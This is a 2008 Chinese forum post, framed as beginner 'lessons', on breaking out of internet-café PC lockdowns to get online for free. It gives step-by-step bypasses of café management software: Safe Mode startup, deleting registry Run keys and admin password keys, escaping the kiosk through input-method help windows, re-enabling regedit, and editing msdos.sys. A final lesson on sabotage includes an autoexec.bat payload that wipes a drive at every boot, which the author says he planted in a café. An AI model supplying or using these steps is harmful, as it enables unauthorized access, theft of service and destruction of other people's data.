六旬老汉侃篮球 發表於 2008-10-8 19:37:21

菜鸟的网吧常见漏洞入侵

<br />

第一课 首先试试&ldquo;安全模式&rdquo;漏洞。 <br />

  到网吧后开机(不要管理员解锁),一会儿屏幕出现&ldquo;Starting Windows &hellip;&hellip;&rdquo;时,按下&quot;F5&quot;键启动到&ldquo;安全模式&rdquo;,在&ldquo;开始&rdquo;&rarr;&ldquo;运行&rdquo;框中输入&ldquo;msconfig&rdquo;(回车),打开&ldquo;系统配置实用程序&rdquo;,用鼠标单击&ldquo;启动&rdquo;标签,去掉所有与网管软件有关的项,也可以在运行框中输入&ldquo;regedit&rdquo;打开注册表,删除注册表&ldquo;HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun&rdquo;下的相关键值,更残忍的干脆把网管软件给卸载掉,重新启动计算机后,就可以免费上网了。是不是很简单?不过可要当心网吧老板!如果&ldquo;F5&rdquo;键被屏蔽了,则应该先修改&ldquo;msdos.sys&rdquo;。看看下面的&ldquo;输入法&rdquo;漏洞,大家就知道怎么修改了。 <br />

第二课(本课以&ldquo;网吧管理专家&rdquo;为例) <br />

  照样先开机(启动过程别按&ldquo;F5&rdquo;),没有让管理员解锁的计算机在桌面上有一密码框,是用于验证用户身份的。这里分为会员和管理员,两种身份分别具有不同的使用权限。我不是管理员,所以我不知道管理员密码,在座有哪位知道的?(你不用拼命摇头啦!)没有密码照样能进入!我们可以绕到密码框后面去。用鼠标单击&ldquo;会员卡号&rdquo;框,利用&ldquo;ctrl shift&rdquo;或&ldquo;Ctrl Space(空格键)&rdquo;调出输入法,然后随意输入一个字母,在弹出的输入框上单击鼠标右键,看看有没有&ldquo;帮助&rdquo;。没有的话就用&ldquo;Ctrl Shift&rdquo;切换输入法,直到找出&ldquo;帮助&rdquo;后单击它。鼠标的移动范围被限制了,可以这样破解它:按下&ldquo;Alt Space&rdquo;,在弹出的标题栏菜单上(用键盘)选择&ldquo;移动&rdquo;,再回车两下就OK了。基础打好了,现在让我们看看这个网吧里有什么好东东,用鼠标单击&ldquo;帮助&rdquo;的标题栏图标(有一种帮助没有这个图标,这种帮助好像没什么利用价值)。打开控制菜单后,再单击&ldquo;跳至 URL(J) ...&rdquo;,在弹出的输入框中输入网址或盘符都可以,先去C盘看看,输入&ldquo;C:&rdquo;或&ldquo;file:///C:/&rdquo;。我找&hellip;&hellip; 似乎没什么好玩的。你看那网管软件,就放在这么显眼的地方,也不怕被人执行&ldquo;Uninstall.exe&rdquo;。&hellip;&hellip; 下面就开始上网了。:)去&ldquo;新浪&rdquo;逛逛,打开&ldquo;跳至 URL(J)...&rdquo;框,输入&ldquo;www.sina.com.cn&rdquo;(&ldquo;回车&rdquo;),大家让一让,发生什么事了?网页内容竟然在&ldquo;帮助&rdquo;里显示出来了!如果要去雅虎网站,还得再单击&ldquo;跳至 URL(J) ...&rdquo;,麻烦了点,不如去桌面上找个IE更方便些,这次还是得单击&ldquo;跳至 URL(J)...&rdquo;,输入&ldquo;c:windowsdesktop&rdquo;(回车),或者在刚才打开的c盘上任意选择一个文件夹,按&ldquo;shift Enter(回车)&rdquo;,调出资源管理器,也可以到达桌面。 <br />

  有些人想要管理员密码,你可以自已来设置一个,我惯用的方法是:打开注册表,删除&ldquo;&rdquo;下的键名&ldquo;计算机解锁密码&rdquo;和&ldquo;运行设置程序密码&rdquo;的键值(另外还有其他的密码,均已被编译,要删除就随你便啦!)改完后退出注册表并重新启动计算机,密码框不见了,然后依次单击&ldquo;开始&rarr;设置&rarr;运行设置程序&rdquo;,倘若你觉得该网吧限制太高,不妨把它设置低一点。如果注册表编辑器被禁止,就当我上面的话没说,我们可以用这种方法破解: <br />

  1.在IE地址栏内输入&ldquo;c:&rdquo;,回车。 <br />

  2.单击&ldquo;文件&rdquo;菜单,新建一份文本文档,输入如下代码:<br />

以下是代码片段:<br />

 Regedit4 <br />

   <br />

&quot;DisableRegistryTools&quot;=dword:01000000 <br />

  将文件另存为&ldquo;1.reg&rdquo;,把它双击安装后就可以使用注册表编辑器了。刚才提到怎样解除&ldquo;F5&rdquo;的限制,利用&ldquo;帮助&rdquo;漏洞来解除可以,但是我想利用&ldquo;快速提示&rdquo;漏洞。<br />

第三课 &ldquo;输入法&rdquo;中的&ldquo;快速提示&rdquo;漏洞<br />

  这节课教大家什么?嗯!是&ldquo;输入法&rdquo;中的&ldquo;快速提示&rdquo;漏洞,目前仅有&ldquo;五笔加加&rdquo;输入法有这个漏洞。照上节课教的,不过这次要大家找的是&ldquo;快速提示&rdquo;,而不是&ldquo;帮助&rdquo;,切换输入法,找到&ldquo;快速提示&rdquo;后单击它,这时出现一个IE窗口(不是太菜的你应该知道干什么用的,上网用的呗!),鼠标移动范围被限制了,破解它(上节课教过了,但是如果IE窗口是最大化的,则应该先在控制菜单中选择&ldquo;恢复为小窗口&rdquo;后再&ldquo;移动&rdquo;,再按&ldquo;回车&rdquo;),这样便可免费上网了,需要打开桌面,最简单的方法是:在IE地址栏上输入&ldquo;桌面&rdquo;(回车)。回顾一下第一节课主要说了什么&hellip;&hellip;嗯!利用&ldquo;F5&rdquo;漏洞免费上网,大多被屏蔽掉了,第二节课说过要利用&ldquo;快速提示&rdquo;漏洞来解除它。怎么做呢?(大家笔拿起来做些笔记),&ldquo;msdos.sys&rdquo;文件在C盘根目录下一般是以&ldquo;隐藏&rdquo;和&ldquo;只读&rdquo;形式储存的,我们需要先去掉它的&ldquo;只读&rdquo;属性,要不然无法对它做任何修改,在IE地址栏上输入&ldquo;file:///C:/command.com&rdquo;回车,打开&ldquo;ms-dos方式&rdquo;,在提示符下输入 &ldquo;attrib -r c:msdos.sys&rdquo;(回车)以去掉&ldquo;只读&rdquo;属性,再返回到IE地址栏上输入&ldquo;file:///C:/msdos.sys&rdquo;(回车),把&ldquo;打开方式&rdquo;设为&ldquo;记事本&rdquo;,把&ldquo;option&rdquo;下的&ldquo;BootKeys&rdquo;的值改为&ldquo;1&rdquo;,保存退出。重新启动计算机便可使修改生效。 <br />

  上面讲的都是以&ldquo;网吧管理专家&rdquo;网管软件为例,如果是&ldquo;美萍&rdquo;控制的计算机,得先打开&ldquo;开始&rarr;会员登陆&rdquo;,接下来与&ldquo;网吧管理专家&rdquo;操作过程相同。再补充一点,其实免费上网还有一种方法,不过成功率不高,就是使网管软件出错,我是用键盘上的&ldquo;Ctrl、Shift、Alt&rdquo;三个键中任一键或任两键配合其他键狂按,结果网管软件报错退出,&ldquo;我的电脑&rdquo;和&ldquo;回收站&rdquo;等都出现在桌面上了。 <br />

第四课 一些破坏网吧数据的方法(那位耳朵伸得那么长,想必是网德不善者)。 <br />

  破坏1(破坏级别:中): <br />

   <br />

  在IE&ldquo;地址栏&rdquo;或&ldquo;jump to URL&rdquo;中输入&ldquo;file:///c:/windows/control.exe&rdquo;,打开&ldquo;控制面板&rarr; 添加/删除程序&rdquo;,卸载掉你&ldquo;感兴趣&rdquo;的应用程序。 <br />

  破坏2(破坏级别:中&rarr;高): <br />

   <br />

  为了防止文件被删除,网管软件一般都屏蔽了鼠标右键,并且连键盘上的&ldquo;Delete&rdquo;和&ldquo;Shift Delete&rdquo;也无效,不过据我所知,在&ldquo;网吧管理专家&rdquo;控制下的数据可以用&ldquo;Ctrl D&rdquo;来删除。 so.bitsCN.com网管资料库任你搜 <br />

  破坏3(破坏级别:高): <br />

  修改C盘根目录下的&ldquo;autoexec.bat&rdquo;文件为如下代码: <br />

以下是代码片段:<br />

@echo off <br />

  path=c:windows;c:windowscommand <br />

  smartdrv &gt;nul <br />

  deltree /y D:. &gt;nul <br />

  这些代码是我前段时间在某网吧里预留的,后果只是使硬盘D分区的数据全部丢失而已,但计算机仍可启动(因为操作系统被装在C盘),若将第四段代码的&ldquo;D:&rdquo;改为&ldquo;C:&rdquo;,有什么后果?你试试就知道了,像我这样心地善良,乐于助人的人,是不会那么做的。

<br />
頁: [1]
查看完整版本: 菜鸟的网吧常见漏洞入侵